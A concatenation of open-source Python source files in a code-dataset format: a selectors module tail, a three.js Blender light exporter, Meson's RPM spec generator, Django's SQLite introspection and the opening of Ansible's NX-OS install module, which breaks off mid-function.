timeout = 0.0
else:
# select.epoll.poll() has a resolution of 1 millisecond
# but luckily takes seconds so we don't need a wrapper
# like PollSelector. Just for better rounding.
timeout = math.ceil(timeout * 1e3) * 1e-3
timeout = float(timeout)
else:
timeout = -1.0 # epoll.poll() must have a float.
# We always want at least 1 to ensure that select can be called
# with no file descriptors registered. Otherwise it will fail.
max_events = max(len(self._fd_to_key), 1)
ready = []
fd_events = _syscall_wrapper(self._epoll.poll, True,
timeout=timeout,
maxevents=max_events)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.EPOLLIN:
events |= EVENT_WRITE
if event_mask & ~select.EPOLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
def close(self):
self._epoll.close()
super(EpollSelector, self).close()
__all__.append('EpollSelector')
if hasattr(select, "devpoll"):
class DevpollSelector(BaseSelector):
"""Solaris /dev/poll selector."""
def __init__(self):
super(DevpollSelector, self).__init__()
self._devpoll = select.devpoll()
def fileno(self):
return self._devpoll.fileno()
def register(self, fileobj, events, data=None):
key = super(DevpollSelector, self).register(fileobj, events, data)
poll_events = 0
if events & EVENT_READ:
poll_events |= select.POLLIN
if events & EVENT_WRITE:
poll_events |= select.POLLOUT
self._devpoll.register(key.fd, poll_events)
return key
def unregister(self, fileobj):
key = super(DevpollSelector, self).unregister(fileobj)
self._devpoll.unregister(key.fd)
return key
def _wrap_poll(self, timeout=None):
""" Wrapper function for select.poll.poll() so that
_syscall_wrapper can work with only seconds. """
if timeout is not None:
if timeout <= 0:
timeout = 0
else:
# select.devpoll.poll() has a resolution of 1 millisecond,
# round away from zero to wait *at least* timeout seconds.
timeout = math.ceil(timeout * 1e3)
result = self._devpoll.poll(timeout)
return result
def select(self, timeout=None):
ready = []
fd_events = _syscall_wrapper(self._wrap_poll, True, timeout=timeout)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.POLLIN:
events |= EVENT_WRITE
if event_mask & ~select.POLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
def close(self):
self._devpoll.close()
super(DevpollSelector, self).close()
__all__.append('DevpollSelector')
if hasattr(select, "kqueue"):
class KqueueSelector(BaseSelector):
""" Kqueue / Kevent-based selector """
def __init__(self):
super(KqueueSelector, self).__init__()
self._kqueue = select.kqueue()
def fileno(self):
return self._kqueue.fileno()
def register(self, fileobj, events, data=None):
key = super(KqueueSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
if events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
return key
def unregister(self, fileobj):
key = super(KqueueSelector, self).unregister(fileobj)
if key.events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
if key.events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
return key
def select(self, timeout=None):
if timeout is not None:
timeout = max(timeout, 0)
max_events = len(self._fd_to_key) * 2
ready_fds = {}
kevent_list = _syscall_wrapper(self._kqueue.control, True,
None, max_events, timeout)
for kevent in kevent_list:
fd = kevent.ident
event_mask = kevent.filter
events = 0
if event_mask == select.KQ_FILTER_READ:
events |= EVENT_READ
if event_mask == select.KQ_FILTER_WRITE:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
if key.fd not in ready_fds:
ready_fds[key.fd] = (key, events & key.events)
else:
old_events = ready_fds[key.fd][1]
ready_fds[key.fd] = (key, (events | old_events) & key.events)
return list(ready_fds.values())
def close(self):
self._kqueue.close()
super(KqueueSelector, self).close()
__all__.append('KqueueSelector')
# Choose the best implementation, roughly:
# kqueue == epoll == devpoll > poll > select.
# select() also can't accept a FD > FD_SETSIZE (usually around 1024)
if 'KqueueSelector' in globals(): # Platform-specific: Mac OS and BSD
DefaultSelector = KqueueSelector
elif 'DevpollSelector' in globals():
DefaultSelector = DevpollSelector
elif 'EpollSelector' in globals(): # Platform-specific: Linux
DefaultSelector = EpollSelector
elif 'PollSelector' in globals(): # Platform-specific: Linux
DefaultSelector = PollSelector
elif 'SelectSelector' in globals(): # Platform-specific: Windows
DefaultSelector = SelectSelector
else: # Platform-specific: AppEngine
def no_selector(_):
raise ValueError("Platform does not have a selector")
DefaultSelector = no_selector
HAS_SELECT = False
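# Minimal usage sketch (not part of the original module), assuming a platform
# where HAS_SELECT ends up True: register one end of a socket pair for read
# events, make it readable, and wait for it with DefaultSelector.
#
# a, b = socket.socketpair()
# sel = DefaultSelector()
# sel.register(a, EVENT_READ, data='my-context')
# b.send(b'ping')
# for key, events in sel.select(timeout=1.0):
#     assert events & EVENT_READ and key.data == 'my-context'
#     payload = key.fileobj.recv(4)
# sel.close(); a.close(); b.close()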
|
gpl-3.0
|
rgaino/three.js
|
utils/exporters/blender/addons/io_three/exporter/api/light.py
|
195
|
1099
|
from bpy import data, types
from .. import utilities, logger
def _lamp(func):
"""
:param func:
"""
def inner(name, *args, **kwargs):
"""
:param name:
:param *args:
:param **kwargs:
"""
if isinstance(name, types.Lamp):
lamp = name
else:
lamp = data.lamps[name]
return func(lamp, *args, **kwargs)
return inner
@_lamp
def angle(lamp):
"""
:param lamp:
:rtype: float
"""
logger.debug("light.angle(%s)", lamp)
return lamp.spot_size
@_lamp
def color(lamp):
"""
:param lamp:
:rtype: int
"""
logger.debug("light.color(%s)", lamp)
colour = (lamp.color.r, lamp.color.g, lamp.color.b)
return utilities.rgb2int(colour)
@_lamp
def distance(lamp):
"""
:param lamp:
:rtype: float
"""
logger.debug("light.distance(%s)", lamp)
return lamp.distance
@_lamp
def intensity(lamp):
"""
:param lamp:
:rtype: float
"""
logger.debug("light.intensity(%s)", lamp)
return round(lamp.energy, 2)
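# Usage sketch (not part of the original exporter): thanks to the _lamp
# decorator, every function above accepts either a bpy Lamp datablock or its
# name; the lamp name 'Lamp' below is only an assumption for illustration.
#
# hex_colour = color('Lamp')  # equivalent to color(data.lamps['Lamp'])
# spot_angle = angle(data.lamps['Lamp'])
# lamp_energy = intensity('Lamp')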
|
mit
|
pexip/meson
|
mesonbuild/modules/rpm.py
|
2
|
8284
|
# Copyright 2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''This module provides helper functions for RPM-related
functionality, such as generating a template RPM spec file.'''
from .. import build
from .. import compilers
import datetime
from .. import mlog
from . import GirTarget, TypelibTarget
from . import ModuleReturnValue
from . import ExtensionModule
from ..interpreterbase import noKwargs
import os
class RPMModule(ExtensionModule):
@noKwargs
def generate_spec_template(self, coredata, args, kwargs):
self.coredata = coredata
required_compilers = self.__get_required_compilers()
proj = coredata.project_name.replace(' ', '_').replace('\t', '_')
so_installed = False
devel_subpkg = False
files = set()
files_devel = set()
to_delete = set()
for target in coredata.targets.values():
if isinstance(target, build.Executable) and target.need_install:
files.add('%%{_bindir}/%s' % target.get_filename())
elif isinstance(target, build.SharedLibrary) and target.need_install:
files.add('%%{_libdir}/%s' % target.get_filename())
for alias in target.get_aliases():
if alias.endswith('.so'):
files_devel.add('%%{_libdir}/%s' % alias)
else:
files.add('%%{_libdir}/%s' % alias)
so_installed = True
elif isinstance(target, build.StaticLibrary) and target.need_install:
to_delete.add('%%{buildroot}%%{_libdir}/%s' % target.get_filename())
mlog.warning('removing', mlog.bold(target.get_filename()),
'from package because packaging static libs not recommended')
elif isinstance(target, GirTarget) and target.should_install():
files_devel.add('%%{_datadir}/gir-1.0/%s' % target.get_filename()[0])
elif isinstance(target, TypelibTarget) and target.should_install():
files.add('%%{_libdir}/girepository-1.0/%s' % target.get_filename()[0])
for header in coredata.headers:
if header.get_install_subdir():
files_devel.add('%%{_includedir}/%s/' % header.get_install_subdir())
else:
for hdr_src in header.get_sources():
files_devel.add('%%{_includedir}/%s' % hdr_src)
for man in coredata.man:
for man_file in man.get_sources():
files.add('%%{_mandir}/man%u/%s.*' % (int(man_file.split('.')[-1]), man_file))
if files_devel:
devel_subpkg = True
filename = os.path.join(coredata.environment.get_build_dir(),
'%s.spec' % proj)
with open(filename, 'w+') as fn:
fn.write('Name: %s\n' % proj)
fn.write('Version: # FIXME\n')
fn.write('Release: 1%{?dist}\n')
fn.write('Summary: # FIXME\n')
fn.write('License: # FIXME\n')
fn.write('\n')
fn.write('Source0: %{name}-%{version}.tar.xz # FIXME\n')
fn.write('\n')
fn.write('BuildRequires: meson\n')
for compiler in required_compilers:
fn.write('BuildRequires: %s\n' % compiler)
for dep in coredata.environment.coredata.deps.host:
fn.write('BuildRequires: pkgconfig(%s)\n' % dep[0])
# ext_libs and ext_progs have been removed from coredata so the following code
# no longer works. It is kept as a reminder of the idea should anyone wish
# to re-implement it.
#
# for lib in state.environment.coredata.ext_libs.values():
# name = lib.get_name()
# fn.write('BuildRequires: {} # FIXME\n'.format(name))
# mlog.warning('replace', mlog.bold(name), 'with the real package.',
# 'You can use following command to find package which '
# 'contains this lib:',
# mlog.bold("dnf provides '*/lib{}.so'".format(name)))
# for prog in state.environment.coredata.ext_progs.values():
# if not prog.found():
# fn.write('BuildRequires: %%{_bindir}/%s # FIXME\n' %
# prog.get_name())
# else:
# fn.write('BuildRequires: {}\n'.format(prog.get_path()))
fn.write('\n')
fn.write('%description\n')
fn.write('\n')
if devel_subpkg:
fn.write('%package devel\n')
fn.write('Summary: Development files for %{name}\n')
fn.write('Requires: %{name}%{?_isa} = %{?epoch:%{epoch}:}%{version}-%{release}\n')
fn.write('\n')
fn.write('%description devel\n')
fn.write('Development files for %{name}.\n')
fn.write('\n')
fn.write('%prep\n')
fn.write('%autosetup\n')
fn.write('\n')
fn.write('%build\n')
fn.write('%meson\n')
fn.write('%meson_build\n')
fn.write('\n')
fn.write('%install\n')
fn.write('%meson_install\n')
if to_delete:
fn.write('rm -vf %s\n' % ' '.join(to_delete))
fn.write('\n')
fn.write('%check\n')
fn.write('%meson_test\n')
fn.write('\n')
fn.write('%files\n')
for f in files:
fn.write('%s\n' % f)
fn.write('\n')
if devel_subpkg:
fn.write('%files devel\n')
for f in files_devel:
fn.write('%s\n' % f)
fn.write('\n')
if so_installed:
fn.write('%post -p /sbin/ldconfig\n')
fn.write('%postun -p /sbin/ldconfig\n')
fn.write('\n')
fn.write('%changelog\n')
fn.write('* %s meson <[email protected]> - \n' %
datetime.date.today().strftime('%a %b %d %Y'))
fn.write('- \n')
fn.write('\n')
mlog.log('RPM spec template written to %s.spec.\n' % proj)
return ModuleReturnValue(None, [])
def __get_required_compilers(self):
required_compilers = set()
for compiler in self.coredata.compilers.values():
# Elbrus has one 'lcc' package for every compiler
if isinstance(compiler, compilers.GnuCCompiler):
required_compilers.add('gcc')
elif isinstance(compiler, compilers.GnuCPPCompiler):
required_compilers.add('gcc-c++')
elif isinstance(compiler, compilers.ElbrusCCompiler):
required_compilers.add('lcc')
elif isinstance(compiler, compilers.ElbrusCPPCompiler):
required_compilers.add('lcc')
elif isinstance(compiler, compilers.ElbrusFortranCompiler):
required_compilers.add('lcc')
elif isinstance(compiler, compilers.ValaCompiler):
required_compilers.add('vala')
elif isinstance(compiler, compilers.GnuFortranCompiler):
required_compilers.add('gcc-gfortran')
elif isinstance(compiler, compilers.GnuObjCCompiler):
required_compilers.add('gcc-objc')
elif compiler == compilers.GnuObjCPPCompiler:
required_compilers.add('gcc-objc++')
else:
mlog.log('RPM spec file not created, generation not allowed for:',
mlog.bold(compiler.get_id()))
return required_compilers
def initialize(*args, **kwargs):
return RPMModule(*args, **kwargs)
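# Usage sketch (not part of the original module): from a project's meson.build
# the module is imported and the spec template generated roughly like this;
# the method name comes from the class above, the rest is standard Meson DSL.
#
#   rpm = import('rpm')
#   rpm.generate_spec_template()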
|
apache-2.0
|
RobertWWong/WebDev
|
djangoApp/ENV/lib/python3.5/site-packages/django/db/backends/sqlite3/introspection.py
|
44
|
12308
|
import re
import warnings
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.db.models.indexes import Index
from django.utils.deprecation import RemovedInDjango21Warning
field_size_re = re.compile(r'^\s*(?:var)?char\s*\(\s*(\d+)\s*\)\s*$')
def get_field_size(name):
""" Extract the size number from a "varchar(11)" type name """
m = field_size_re.search(name)
return int(m.group(1)) if m else None
# This light wrapper "fakes" a dictionary interface, because some SQLite data
# types include variables in them -- e.g. "varchar(30)" -- and can't be matched
# as a simple dictionary lookup.
class FlexibleFieldLookupDict(object):
# Maps SQL types to Django Field types. Some of the SQL types have multiple
# entries here because SQLite allows for anything and doesn't normalize the
# field type; it uses whatever was given.
base_data_types_reverse = {
'bool': 'BooleanField',
'boolean': 'BooleanField',
'smallint': 'SmallIntegerField',
'smallint unsigned': 'PositiveSmallIntegerField',
'smallinteger': 'SmallIntegerField',
'int': 'IntegerField',
'integer': 'IntegerField',
'bigint': 'BigIntegerField',
'integer unsigned': 'PositiveIntegerField',
'decimal': 'DecimalField',
'real': 'FloatField',
'text': 'TextField',
'char': 'CharField',
'blob': 'BinaryField',
'date': 'DateField',
'datetime': 'DateTimeField',
'time': 'TimeField',
}
def __getitem__(self, key):
key = key.lower()
try:
return self.base_data_types_reverse[key]
except KeyError:
size = get_field_size(key)
if size is not None:
return ('CharField', {'max_length': size})
raise KeyError
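# Illustration (not part of the original file) of the lookup behaviour above:
# exact type names are resolved from base_data_types_reverse, while sized
# character types fall back to the regex-based size extraction.
#
# _lookup = FlexibleFieldLookupDict()
# assert _lookup['integer'] == 'IntegerField'
# assert _lookup['VARCHAR(30)'] == ('CharField', {'max_length': 30})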
class DatabaseIntrospection(BaseDatabaseIntrospection):
data_types_reverse = FlexibleFieldLookupDict()
def get_table_list(self, cursor):
"""
Returns a list of table and view names in the current database.
"""
# Skip the sqlite_sequence system table used for autoincrement key
# generation.
cursor.execute("""
SELECT name, type FROM sqlite_master
WHERE type in ('table', 'view') AND NOT name='sqlite_sequence'
ORDER BY name""")
return [TableInfo(row[0], row[1][0]) for row in cursor.fetchall()]
def get_table_description(self, cursor, table_name):
"Returns a description of the table, with the DB-API cursor.description interface."
return [
FieldInfo(
info['name'],
info['type'],
None,
info['size'],
None,
None,
info['null_ok'],
info['default'],
) for info in self._table_info(cursor, table_name)
]
def column_name_converter(self, name):
"""
SQLite will in some cases, e.g. when returning columns from views and
subselects, return column names in 'alias."column"' format instead of
simply 'column'.
Affects SQLite < 3.7.15, fixed by http://www.sqlite.org/src/info/5526e0aa3c
"""
# TODO: remove when SQLite < 3.7.15 is sufficiently old.
# 3.7.13 ships in Debian stable as of 2014-03-21.
if self.connection.Database.sqlite_version_info < (3, 7, 15):
return name.split('.')[-1].strip('"')
else:
return name
def get_relations(self, cursor, table_name):
"""
Return a dictionary of {field_name: (field_name_other_table, other_table)}
representing all relationships to the given table.
"""
# Dictionary of relations to return
relations = {}
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
try:
results = cursor.fetchone()[0].strip()
except TypeError:
# It might be a view, then no results will be returned
return relations
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_desc in results.split(','):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'references (\S*) ?\(["|]?(.*)["|]?\)', field_desc, re.I)
if not m:
continue
table, column = [s.strip('"') for s in m.groups()]
if field_desc.startswith("FOREIGN KEY"):
# Find name of the target FK field
m = re.match(r'FOREIGN KEY\s*\(([^\)]*)\).*', field_desc, re.I)
field_name = m.groups()[0].strip('"')
else:
field_name = field_desc.split()[0].strip('"')
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s", [table])
result = cursor.fetchall()[0]
other_table_results = result[0].strip()
li, ri = other_table_results.index('('), other_table_results.rindex(')')
other_table_results = other_table_results[li + 1:ri]
for other_desc in other_table_results.split(','):
other_desc = other_desc.strip()
if other_desc.startswith('UNIQUE'):
continue
other_name = other_desc.split(' ', 1)[0].strip('"')
if other_name == column:
relations[field_name] = (other_name, table)
break
return relations
def get_key_columns(self, cursor, table_name):
"""
Returns a list of (column_name, referenced_table_name, referenced_column_name) for all
key columns in given table.
"""
key_columns = []
# Schema for this table
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
results = cursor.fetchone()[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
# Walk through and look for references to other tables. SQLite doesn't
# really have enforced references, but since it echoes out the SQL used
# to create the table we can look for REFERENCES statements used there.
for field_index, field_desc in enumerate(results.split(',')):
field_desc = field_desc.strip()
if field_desc.startswith("UNIQUE"):
continue
m = re.search(r'"(.*)".*references (.*) \(["|](.*)["|]\)', field_desc, re.I)
if not m:
continue
# This will append (column_name, referenced_table_name, referenced_column_name) to key_columns
key_columns.append(tuple(s.strip('"') for s in m.groups()))
return key_columns
def get_indexes(self, cursor, table_name):
warnings.warn(
"get_indexes() is deprecated in favor of get_constraints().",
RemovedInDjango21Warning, stacklevel=2
)
indexes = {}
for info in self._table_info(cursor, table_name):
if info['pk'] != 0:
indexes[info['name']] = {'primary_key': True,
'unique': False}
cursor.execute('PRAGMA index_list(%s)' % self.connection.ops.quote_name(table_name))
# seq, name, unique
for index, unique in [(field[1], field[2]) for field in cursor.fetchall()]:
cursor.execute('PRAGMA index_info(%s)' % self.connection.ops.quote_name(index))
info = cursor.fetchall()
# Skip indexes across multiple fields
if len(info) != 1:
continue
name = info[0][2] # seqno, cid, name
indexes[name] = {'primary_key': indexes.get(name, {}).get("primary_key", False),
'unique': unique}
return indexes
def get_primary_key_column(self, cursor, table_name):
"""
Get the column name of the primary key for the given table.
"""
# Don't use PRAGMA because that causes issues with some transactions
cursor.execute("SELECT sql FROM sqlite_master WHERE tbl_name = %s AND type = %s", [table_name, "table"])
row = cursor.fetchone()
if row is None:
raise ValueError("Table %s does not exist" % table_name)
results = row[0].strip()
results = results[results.index('(') + 1:results.rindex(')')]
for field_desc in results.split(','):
field_desc = field_desc.strip()
m = re.search('"(.*)".*PRIMARY KEY( AUTOINCREMENT)?', field_desc)
if m:
return m.groups()[0]
return None
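# Worked example (not in the original file): for a table created with
#   CREATE TABLE "demo" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "name" text)
# the loop above matches the '"(.*)".*PRIMARY KEY( AUTOINCREMENT)?' pattern on
# the first column definition and returns 'id'.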
def _table_info(self, cursor, name):
cursor.execute('PRAGMA table_info(%s)' % self.connection.ops.quote_name(name))
# cid, name, type, notnull, default_value, pk
return [{
'name': field[1],
'type': field[2],
'size': get_field_size(field[2]),
'null_ok': not field[3],
'default': field[4],
'pk': field[5], # undocumented
} for field in cursor.fetchall()]
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index) across one or more columns.
"""
constraints = {}
# Get the index info
cursor.execute("PRAGMA index_list(%s)" % self.connection.ops.quote_name(table_name))
for row in cursor.fetchall():
# Sqlite3 3.8.9+ has 5 columns, however older versions only give 3
# columns. Discard last 2 columns if there.
number, index, unique = row[:3]
# Get the index info for that index
cursor.execute('PRAGMA index_info(%s)' % self.connection.ops.quote_name(index))
for index_rank, column_rank, column in cursor.fetchall():
if index not in constraints:
constraints[index] = {
"columns": [],
"primary_key": False,
"unique": bool(unique),
"foreign_key": False,
"check": False,
"index": True,
}
constraints[index]['columns'].append(column)
# Add type and column orders for indexes
if constraints[index]['index'] and not constraints[index]['unique']:
# SQLite doesn't support any index type other than b-tree
constraints[index]['type'] = Index.suffix
cursor.execute(
"SELECT sql FROM sqlite_master "
"WHERE type='index' AND name=%s" % self.connection.ops.quote_name(index)
)
orders = []
# There would be only 1 row to loop over
for sql, in cursor.fetchall():
order_info = sql.split('(')[-1].split(')')[0].split(',')
orders = ['DESC' if info.endswith('DESC') else 'ASC' for info in order_info]
constraints[index]['orders'] = orders
# Get the PK
pk_column = self.get_primary_key_column(cursor, table_name)
if pk_column:
# SQLite doesn't actually give a name to the PK constraint,
# so we invent one. This is fine, as the SQLite backend never
# deletes PK constraints by name, as you can't delete constraints
# in SQLite; we remake the table with a new PK instead.
constraints["__primary__"] = {
"columns": [pk_column],
"primary_key": True,
"unique": False, # It's not actually a unique constraint.
"foreign_key": False,
"check": False,
"index": False,
}
return constraints
|
mit
|
dataxu/ansible
|
lib/ansible/modules/network/nxos/nxos_install_os.py
|
3
|
20862
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_install_os
extends_documentation_fragment: nxos
short_description: Set boot options such as the boot image, kickstart image and ISSU.
description:
- Install an operating system by setting the boot options like boot
image and kickstart image and optionally select to install using
ISSU (In Service Software Upgrade).
notes:
- Tested against the following platforms and images
- N9k 7.0(3)I4(6), 7.0(3)I5(3), 7.0(3)I6(1), 7.0(3)I7(1), 7.0(3)F2(2), 7.0(3)F3(2)
- N3k 6.0(2)A8(6), 6.0(2)A8(8), 7.0(3)I6(1), 7.0(3)I7(1)
- N7k 7.3(0)D1(1), 8.0(1), 8.2(1)
- This module takes longer to execute than the default ansible timeout value and
will generate errors unless the module timeout parameter is set to a
value of 500 seconds or higher.
The example time is sufficient for most upgrades but this can be
tuned higher based on specific upgrade time requirements.
The module will exit with a failure message if the timer is
not set to 500 seconds or higher.
- Do not include full file paths, just the name of the file(s) stored on
the top level flash directory.
- This module attempts to install the software immediately,
which may trigger a reboot.
- In check mode, the module will indicate if an upgrade is needed and
whether or not the upgrade is disruptive or non-disruptive (ISSU).
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
version_added: 2.2
options:
system_image_file:
description:
- Name of the system (or combined) image file on flash.
required: true
kickstart_image_file:
description:
- Name of the kickstart image file on flash.
(Not required on all Nexus platforms)
required: false
default: null
issu:
version_added: "2.5"
description:
- Upgrade using In Service Software Upgrade (ISSU).
(Only supported on N9k platforms)
- Selecting 'required' or 'yes' means that upgrades will only
proceed if the switch is capable of ISSU.
- Selecting 'desired' means that upgrades will use ISSU if possible
but will fall back to disruptive upgrade if needed.
- Selecting 'no' means do not use ISSU. Forced disruptive.
required: false
choices: ['required', 'desired', 'yes', 'no']
default: 'no'
'''
EXAMPLES = '''
- name: Install OS on N9k
check_mode: no
nxos_install_os:
system_image_file: nxos.7.0.3.I6.1.bin
issu: desired
provider: "{{ connection | combine({'timeout': 500}) }}"
- name: Wait for device to come back up with new image
wait_for:
port: 22
state: started
timeout: 500
delay: 60
host: "{{ inventory_hostname }}"
- name: Check installed OS for newly installed version
nxos_command:
commands: ['show version | json']
provider: "{{ connection }}"
register: output
- assert:
that:
- output['stdout'][0]['kickstart_ver_str'] == '7.0(3)I6(1)'
'''
RETURN = '''
install_state:
description: Boot and install information.
returned: always
type: dictionary
sample: {
"install_state": [
"Compatibility check is done:",
"Module bootable Impact Install-type Reason",
"------ -------- -------------- ------------ ------",
" 1 yes non-disruptive reset ",
"Images will be upgraded according to following table:",
"Module Image Running-Version(pri:alt) New-Version Upg-Required",
"------ ---------- ---------------------------------------- -------------------- ------------",
" 1 nxos 7.0(3)I6(1) 7.0(3)I7(1) yes",
" 1 bios v4.4.0(07/12/2017) v4.4.0(07/12/2017) no"
],
}
'''
import re
from time import sleep
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
def check_ansible_timer(module):
'''Check Ansible Timer Values'''
msg = "The 'timeout' provider param value for this module to execute\n"
msg = msg + 'properly is too low.\n'
msg = msg + 'Upgrades can take a long time so the value needs to be set\n'
msg = msg + 'to the recommended value of 500 seconds or higher in the\n'
msg = msg + 'ansible playbook for the nxos_install_os module.\n'
msg = msg + '\n'
msg = msg + 'provider: "{{ connection | combine({\'timeout\': 500}) }}"'
data = module.params.get('provider')
timer_low = False
if data.get('timeout') is None:
timer_low = True
if data.get('timeout') is not None and data.get('timeout') < 500:
timer_low = True
if timer_low:
module.fail_json(msg=msg.split('\n'))
# Output options are 'text' or 'json'
def execute_show_command(module, command, output='text'):
cmds = [{
'command': command,
'output': output,
}]
return run_commands(module, cmds)
def get_platform(module):
"""Determine platform type"""
data = execute_show_command(module, 'show inventory', 'json')
pid = data[0]['TABLE_inv']['ROW_inv'][0]['productid']
if re.search(r'N3K', pid):
type = 'N3K'
elif re.search(r'N5K', pid):
type = 'N5K'
elif re.search(r'N6K', pid):
type = 'N6K'
elif re.search(r'N7K', pid):
type = 'N7K'
elif re.search(r'N9K', pid):
type = 'N9K'
else:
type = 'unknown'
return type
def parse_show_install(data):
"""Helper method to parse the output of the 'show install all impact' or
'install all' commands.
Sample Output:
Installer will perform impact only check. Please wait.
Verifying image bootflash:/nxos.7.0.3.F2.2.bin for boot variable "nxos".
[####################] 100% -- SUCCESS
Verifying image type.
[####################] 100% -- SUCCESS
Preparing "bios" version info using image bootflash:/nxos.7.0.3.F2.2.bin.
[####################] 100% -- SUCCESS
Preparing "nxos" version info using image bootflash:/nxos.7.0.3.F2.2.bin.
[####################] 100% -- SUCCESS
Performing module support checks.
[####################] 100% -- SUCCESS
Notifying services about system upgrade.
[####################] 100% -- SUCCESS
Compatibility check is done:
Module bootable Impact Install-type Reason
------ -------- -------------- ------------ ------
8 yes disruptive reset Incompatible image for ISSU
21 yes disruptive reset Incompatible image for ISSU
Images will be upgraded according to following table:
Module Image Running-Version(pri:alt) New-Version Upg-Required
------ ---------- ---------------------------------------- -------------------- ------------
8 lcn9k 7.0(3)F3(2) 7.0(3)F2(2) yes
8 bios v01.17 v01.17 no
21 lcn9k 7.0(3)F3(2) 7.0(3)F2(2) yes
21 bios v01.70 v01.70 no
"""
if len(data) > 0:
data = massage_install_data(data)
ud = {'raw': data}
ud['processed'] = []
ud['disruptive'] = False
ud['upgrade_needed'] = False
ud['error'] = False
ud['install_in_progress'] = False
ud['server_error'] = False
ud['upgrade_succeeded'] = False
ud['use_impact_data'] = False
# Check for server errors
if isinstance(data, int):
if data == -1:
ud['server_error'] = True
elif data >= 500:
ud['server_error'] = True
elif data == -32603:
ud['server_error'] = True
return ud
else:
ud['list_data'] = data.split('\n')
for x in ud['list_data']:
# Check for errors and exit if found.
if re.search(r'Pre-upgrade check failed', x):
ud['error'] = True
break
if re.search(r'[I|i]nvalid command', x):
ud['error'] = True
break
if re.search(r'No install all data found', x):
ud['error'] = True
break
# Check for potentially transient conditions
if re.search(r'Another install procedure may be in progress', x):
ud['install_in_progress'] = True
break
if re.search(r'Backend processing error', x):
ud['server_error'] = True
break
if re.search(r'^(-1|5\d\d)$', x):
ud['server_error'] = True
break
# Check for messages indicating a successful upgrade.
if re.search(r'Finishing the upgrade', x):
ud['upgrade_succeeded'] = True
break
if re.search(r'Install has been successful', x):
ud['upgrade_succeeded'] = True
break
# We get these messages when the upgrade is non-disruptive and
# we lose connection during the switchover but are far enough along that
# we can be confident the upgrade succeeded.
if re.search(r'timeout trying to send command: install', x):
ud['upgrade_succeeded'] = True
ud['use_impact_data'] = True
break
if re.search(r'[C|c]onnection failure: timed out', x):
ud['upgrade_succeeded'] = True
ud['use_impact_data'] = True
break
# Begin normal parsing.
if re.search(r'----|Module|Images will|Compatibility', x):
ud['processed'].append(x)
continue
# Check to see if upgrade will be disruptive or non-disruptive and
# build dictionary of individual modules and their status.
# Sample Line:
#
# Module bootable Impact Install-type Reason
# ------ -------- ---------- ------------ ------
# 8 yes disruptive reset Incompatible image
rd = r'(\d+)\s+(\S+)\s+(disruptive|non-disruptive)\s+(\S+)'
mo = re.search(rd, x)
if mo:
ud['processed'].append(x)
key = 'm%s' % mo.group(1)
field = 'disruptive'
if mo.group(3) == 'non-disruptive':
ud[key] = {field: False}
else:
ud[field] = True
ud[key] = {field: True}
field = 'bootable'
if mo.group(2) == 'yes':
ud[key].update({field: True})
else:
ud[key].update({field: False})
continue
# Check to see if switch needs an upgrade and build a dictionary
# of individual modules and their individual upgrade status.
# Sample Line:
#
# Module Image Running-Version(pri:alt) New-Version Upg-Required
# ------ ----- ---------------------------------------- ------------
# 8 lcn9k 7.0(3)F3(2) 7.0(3)F2(2) yes
mo = re.search(r'(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(yes|no)', x)
if mo:
ud['processed'].append(x)
key = 'm%s_%s' % (mo.group(1), mo.group(2))
field = 'upgrade_needed'
if mo.group(5) == 'yes':
ud[field] = True
ud[key] = {field: True}
else:
